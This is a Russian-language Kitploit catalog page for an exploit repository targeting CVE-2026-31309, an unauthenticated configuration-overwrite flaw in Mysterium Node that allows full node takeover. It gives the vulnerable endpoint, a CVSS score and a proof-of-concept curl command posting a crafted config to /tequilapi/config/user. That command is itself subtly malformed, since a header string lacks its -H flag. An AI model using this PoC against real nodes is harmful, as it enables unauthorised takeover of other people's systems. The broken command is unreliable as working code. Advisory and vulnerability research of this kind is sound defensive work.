Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-31309 — Некорректное управление доступом в Mysterium Node до версии v1.36.0 | Kitploit
Инструменты/GitHubGitHub/sch8ill/cve-2026-31309
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеRed Teaming
GitHubsch8ill/cve-2026-31309

CVE-2026-31309

Некорректное управление доступом в Mysterium Node до версии v1.36.0

Репозиторий
11 месяц назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-31309: Некорректный контроль доступа в Mysterium Node до версии v1.36.0

Некорректная авторизация в конечной точке /tequilapi/config/user Mysterium Node с версии v1.21.1-rc0 до v1.36.0 позволяет неаутентифицированному злоумышленнику произвольно перезаписывать конфигурацию узла и добиться полного захвата узла с помощью специально составленного POST-запроса.

CVSS

Оценка: 9.8 (КРИТИЧЕСКИЙ)

Вектор: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

PoC

root@kitploit:~
curl -X POST \
    "Content-Type: application/json" \
    -d @config.json \
    http://<host>:<port>/tequilapi/config/user

Обнаружено Till Schacht.

Ссылки

  • https://nvd.nist.gov/vuln/detail/CVE-2026-31309
  • https://www.cve.org/CVERecord?id=CVE-2026-31309
  • https://github.com/advisories/GHSA-p7gf-g6r8-g65h
Скачать инструмент